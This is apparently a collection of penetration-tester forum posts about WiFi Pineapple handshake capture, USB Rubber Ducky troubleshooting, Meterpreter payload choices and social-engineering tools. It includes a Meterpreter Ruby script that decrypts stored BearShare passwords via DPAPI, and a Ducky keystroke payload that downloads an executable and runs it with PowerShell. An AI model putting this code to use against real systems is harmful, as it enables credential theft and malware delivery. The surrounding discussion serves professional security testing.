mubix

When I do physical assessments that have WPA/2 enabled wireless networks I would like to have the ability to walk around the facility with a pineapple in my backpack and have it constantly trying to get a handshake in a reliable way. Here are a few requirement requests: Stability is key. I might only get one walk through to get it done. Needs to support more than one WPA ESSID (name). If I am targeting a building and they have a Employee and Guest networks I need to be able to get both in one go. See #1 Ability to automatically verify the handshake is valid via Aircrack or other tool Remove WPA ESSID automatically from the rotation if valid handshake is captured Shutdown the pineapple if all captured (save battery) optional setting Constantly be re-scanning the area for best AP to target. (If "BOBWIFI") is no longer in range it shouldn't attack it again Always target AP with best signal if possible Prioritize APs with clients if possible Have an auto-on with loaded AP names so I can just plug in the Pineapple when it's go time and not have to configure anything post-boot. Have the ability to auto-add APs in the area to a "temp" list while keeping a "target" list. List of APs with captured/verified handshakes for easy download of cap file Use both wifi cards if possible for 5ghz (TETRA) as well as 2ghz Try a few ways to get the handshake, I know there are a few techniques out there but I don't recall them all. Thoughts?

I'm soo late to this game but I made a video to describe my feelings about it and help where I can to spread the word: https://www.youtube.com/watch?v=Wggu_qaYJaQ part of http://hackingtogether.org/ We on this list are for the most part already participating in a social group that has support. I'm not saying we don't have problems, but the ones that don't have such support, who aren't part of any groups or you only see at a con or two, but don't speak, don't participate in CTFs or other side events. Those are the ones (usually) in the most danger of feeling isolated. So, if you know people like that, reach out, invite them to be part of your team, group, or talk. Let us all help to make sure that another life isn't list for avoidable reasons. There are too few of us as it is.

Pictures and screenshots could help with troubleshooting. Right now all we have to go on is this: You are using a 2GB SD card from an old phone formatted to FAT (I'm assuming this is a microSD You tried multiple payloads and they didn't work. Questions: Are you encoding the payloads? What payloads have you tried? Does it recognize as a keyboard when you plug it in? What operating systems have you tried plugging it into? inject.bin is in the root folder of the SD card right?

HowToGeek has a good write up on cracking WPA - http://www.howtogeek.com/202441/your-wi-fi’s-wpa2-encryption-can-be-cracked-offline-here’s-how/ You also have the Hak5 episode about cracking WPA:

reverse_tcp connections I use when I know that system can get directly to me. bind_tcp I use when I don't have another option and reverse_http / reverse_https are the ones I use the most.

Sorry don't have the phone anymore. Trying to find a phone that will work good. :/

Someone linked me to this on twitter today: http://penturalabs.wordpress.com/2013/07/29/green-for-the-anti-pineapple/

Any ideas on why the droid would show USB not connected, when I connect with the exact same cable to a PC it works just fine. This is what I get in dmesg [ 996.800000] usb 1-1.2: new high-speed USB device number 29 using ehci-platform [ 996.930000] scsi20 : usb-storage 1-1.2:1.0 [ 997.130000] usbcore: deregistering interface driver usbserial_generic [ 997.130000] USB Serial deregistering driver generic [ 997.140000] usbcore: deregistering interface driver usbserial [ 997.170000] usbcore: registered new interface driver usbserial [ 997.170000] USB Serial support registered for generic [ 997.180000] usbcore: registered new interface driver usbserial_generic [ 997.180000] usbserial: USB Serial Driver core [ 997.590000] usb 1-1.2: USB disconnect, device number 29

Mailvelope is still a good solution on Windows. My only hit on the product was that the developer wasn't using the available encryption in Chrome to encrypt his storage so that an offline attacker couldn't get the keys. And yes your point still holds that if people use a good password then the keys will be useless to the attacker.

Honestly these guys covered it really well. Technically Meterpreter itself operates only in memory. So really the only effect it has is when memory is referenced / accessed / or stored (ie. System Profiling software, Normal process execution, and Hibernate respectively). The more evident parts come in a few flavors: How the Meterpreter shellcode / payload gets executed.Is it a binary you put your payload in? a PDF?Where was it stored?Is it backed up? Is it in a location targeted by Volume Shadow Copies or Restore Points? Does the company have a shared storage of roaming profiles? How was it delivered?Was the delivery encrypted? Was it a single delivery or to many hosts/users? What C2 mechanism is used? HTTP/TCP/DNS/etc?Are the comms encrypted? Do they go trough a proxy? These are just a small number of questions, and many you can ask in a lab. Run SecurityOnion's live CD, with a pfSense firewall running Squid, put an XP VM behind them and toss your Social Engineering payload at it with your attack C2 outside of it. Use Sys Internals Process Monitor on the victim. Make sure Bro, and all the other gadets and gizmos SecurityOnion has are enabled and in-line. I guarantee you'll learn a ton just setting everything up, and a ton more once you test out your first SE.

Easiest way is to use Brup proxy to man in the middle all web traffic. Here are some tutorials how: http://carnal0wnage.attackresearch.com/2010/11/iphone-burp.html http://portswigger.net/burp/help/proxy_options_installingcacert.html#iphone You can check in side SSL with that setup. If it's not web and it's using some other protocol you may be out of luck, but good chance that it's using HTTP or HTTPS

If you still have the ability to login as that user, forced password change or not, I think you should still be able to decrypt the password. I forced a password change from one administrator account to the other and once logged in (as the user with bearshare installed) still able to decrypt the bearshare password

Ya, it was password stored in the users store. Wrote a quick script to decrypt: (mostly stolen from post/windows/gather/credentials/outlook.rb) def prepare_railgun rg = session.railgun if (!rg.get_dll('crypt32')) rg.add_dll('crypt32') end end def decrypt_password(data) rg = session.railgun pid = client.sys.process.getpid process = client.sys.process.open(pid, PROCESS_ALL_ACCESS) mem = process.memory.allocate(128) process.memory.write(mem, data) if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86" addr = [mem].pack("V") len = [data.length].pack("V") ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8) #print_status("#{ret.inspect}") len, addr = ret["pDataOut"].unpack("V2") else addr = [mem].pack("Q") len = [data.length].pack("Q") ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16) len, addr = ret["pDataOut"].unpack("Q2") end return "" if len == 0 decrypted_pw = process.memory.read(addr, len) return decrypted_pw end def get_valdata(k, name) @key_base = 'HKCU\\Software\\BearShare\\Users\\superuser@mailinator.com' registry_getvaldata("#{@key_base}\\#{k}", name) end prepare_railgun data = get_valdata("",'Password') print_error data.inspect password = decrypt_password(data) print_status password.inspect And got the following output when logged in as Administrator (who installed Bearshare) and with the password of 'password' meterpreter > run decrypt_bearshare [-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\ x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0 0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01 \x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\ x9E\xC11.d\x96\x95 \xC6" [*] "password\x00" I then exported the entire registry tree for Bearshare and moved it to a new user 'bob', importing it as it was from Administrator: meterpreter > run decrypt_bearshare [-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\ x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0 0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01 \x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\ x9E\xC11.d\x96\x95 \xC6" [*] "" No joy (as expected)

I would like to 2nd that one ;)

I would start with SET (Social Engineering Toolkit) and look at how it does things. There is also SEF (Social Engineering Framework), MetaPhish, and Spear Fishing Toolkit. I think there is also one called FBPwn but I think it's just Java Applet + Facebook.

Check out Metasploit 'signed_java_applet' module. Pretty straight forward. After that you can either use Metasploit to host it or pull that Jar file down and host it anywhere you want with the APPLET tag.

An easy way is to just put the text file next to the Jar, and specify it that way. So put everything in the same directory. Hold shift and right click so you get the "Open Command WindowHere" option. Click it, then just run: java -jar duckencode.jar -i myevilstuff.txt

My personal preference is pfSense. BSD based, fast and easy to use. And I have it running on an embedded system currently so I doubt you'll have any problems running it on anything you want.

I recently added a Ducky payload to the page http://www.usbrubber...ll_wget_execute : Interested in what you guys think. GUI r DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe" ENTER

Anyone happen to grab the script before it was discontinued that doesn't mind sharing? The video looked pretty awesome of it's capabilities.

Nice work, but why are you using Metasploit on windows? Try it out on Backtrack or install it on Ubuntu. You'll get 10x the performance, even in a VM

What is the machine vulnerable to? What patches have been applied? Are your looking to do a completely remote attack against an unused fresh build of Vista? You can try 09_050. Might work.

I have a lot of work to do on camera, and hopefully that is something that I can keep gettng better at going forward. That's very cool that you're working in bio exploitation. Which field? I have a make up metasploit segment in the queue, it's really hard to know when you aren't up to par when there s no one to give you instant feedback now that there is no hakhouse..

How's the project coming along?

Here is a quick link to some tutorials on how to progress: http://www.room362.com/mubixlinks/2009/12/...g-tutorial.html